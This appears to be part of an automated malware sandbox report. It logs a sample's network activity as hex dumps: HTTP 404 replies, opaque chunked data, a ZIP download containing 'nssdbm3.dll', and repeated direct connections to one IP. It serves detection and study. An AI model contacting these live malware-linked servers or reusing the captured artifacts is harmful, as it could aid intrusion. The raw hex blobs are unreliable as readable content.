58 43 f6 e7 2a 92 72 08 aa 14 21 52 ff b3 53 5d 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 bb 75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 1c 5e 68 fc b4 2c f4 47 1f 3f 4d 93 19 60 70 06 7d 52 89 52 8c 3e 09 6e fe ca 39 52 41 cc 35 5f 27 89 98 4c 68 48 94 56 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 a1 95 87 04 7d 32 7d 42 02 42 39 ad d5 d3 3c 86 63 55 cd b7 fb 29 6d da 0a 1e d7 09 07 99 cb 23 5b c4 b5 b5 5f 7c a9 84 79 89 b1 39 ec 06 88 45 fa e6 58 a9 e6 e8 4f 67 2c 5e db 50 c7 95 e6 d8 99 0a e2 4c c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 76 ed f6 4b a5 53 52 d2 c5 d4 d1 79 5e 67 ad 6d 11 b0 c0 db 31 a0 29 77 31 ac b2 03 07 1e 17 76 28 bc db 58 67 4b 5b 67 c2 3f d3 78 d9 f8 1f ba e2 50 11 3b ec 5f e0 3c c7 4b d4 50 b0 20 e1 1e 34 ef d3 2e ac 9c d8 f7 0d c2 23 af 38 15 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 6c 1c 9d 89 05 4d 99 2e b4 58 13 86 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 b1 ba 89 c7 a8 25 9f ae 04 75 64 62 d8 e6 b8 a1 54 5e 1b 80 2b d8 55 a8 c7 ea 87 23 6d 16 be 61 f6 31 6d 17 41 3e da 16 a3 c9 32 6e a0 14 dc ac 2f 7b b0 2d 61 47 b0 7a 0d de 75 8f f9 9f 56 11 36 05 4a f4 e2 d7 c0 07 43 c8 48 09 d2 74 94 82 bf 6c 13 d9 39 03 d5 18 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 8e ff 0e 43 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 85 f6 ff 78 f3 56 db c4 0d 13 13 e3 0f e0 92 24 18 4f c5 03 71 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a f0 96 be 21 51 61 9a d4 3e 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 a2 7a 31 6c 1a 7c 0a 8d 1b f9 e6 0e 10 eb 7e 71 eb 90 f0 1a 10 de 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 a6 0f 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 33 cd 46 99 48 15 ac af eb d9 55 3d af ba 68 92 de fe 9d 57 7c 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b a8 d4 de 8e 82 11 e8 e4 1f 9e a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 af 5b 85 1f d4 8c 69 91 9c 61 06 f1 2c 9a af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 e4 56 89 8b e1 42 78 d7 9c 9e c3 e0 2b a5 b6 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a2 aa 45 63 80 e3 1c b1 65 f5 52 48 d4 3f 96 4d 8d e7 17 3f fe e7 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:16 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc df 85 6e bb f6 c7 35 f3 73 07 03 d2 ff f9 da fb eb b2 b9 71 cd f5 34 33 d1 62 73 45 7c 1f 57 44 f3 08 b9 3c 50 15 51 fe 08 22 b1 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed 45 78 b1 17 20 58 4a ed 68 6a 3e 17 21 6b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 5c 6d 52 db 93 0d 13 13 bf 1e e9 92 28 0e 4f c5 03 a1 cb a1 61 7e de f5 69 77 1e 17 c6 4c af 9a a5 64 c1 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 d3 fb 2d b9 72 ce cc 23 b2 b7 09 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 3f cf cc 46 d9 48 1d ac af e3 d9 55 3d 6b bd 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 aa 6c b1 1d 32 12 51 8c bc 10 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 46 9d 16 ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 74 5d 01 f1 10 35 ae 03 58 e5 1f e4 ae 7d 10 99 80 e0 d9 b0 c1 1c 9e 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 80 8a 49 37 03 80 e3 1c cd 20 f5 52 b7 3b 3a 96 f5 cb e7 17 3f dc e5 7e 0d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 98 3a 1d f8 4e b5 14 86 c1 70 a8 fe 04 c5 db ad 0e c9 9c 47 a2 91 29 98 f9 4c 79 de 79 d5 57 d0 6f fd ef 76 67 a8 db e9 d5 6a e2 3c 99 a8 84 be 57 a7 eb 6c 28 8e 94 16 a3 4e d4 e7 23 b2 52 dc 1a 9e 8b 18 07 64 01 7d 46 02 82 96 c6 ce 2d b2 9d df 3c 42 56 60 de 9e 93 0f 94 45 a9 24 4f 78 60 22 30 5f d6 a0 b8 78 fe b1 8e 98 37 20 5e 32 d0 c9 f3 32 42 82 39 16 12 47 0b f9 17 30 8d e3 51 22 b2 3d df 10 54 5a 17 1c 5c 5a 12 b3 19 5f 11 8f 69 f9 e4 b9 2a 01 6e f3 fd 58 b3 dc 95 25 1f 90 13 f7 5e 15 23 b5 01 92 e3 92 c2 01 7d 7e d3 95 bc 43 cf 76 62 93 55 e1 05 85 d4 9c 97 2e 60 10 3a 93 83 ac e5 fe 99 ae 32 c8 6e 95 8d 4a d5 f8 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 fb 37 67 d2 1f ad af a2 e2 54 24 d0 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:17 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=92Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:19 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Downloads compressed data via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:15 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
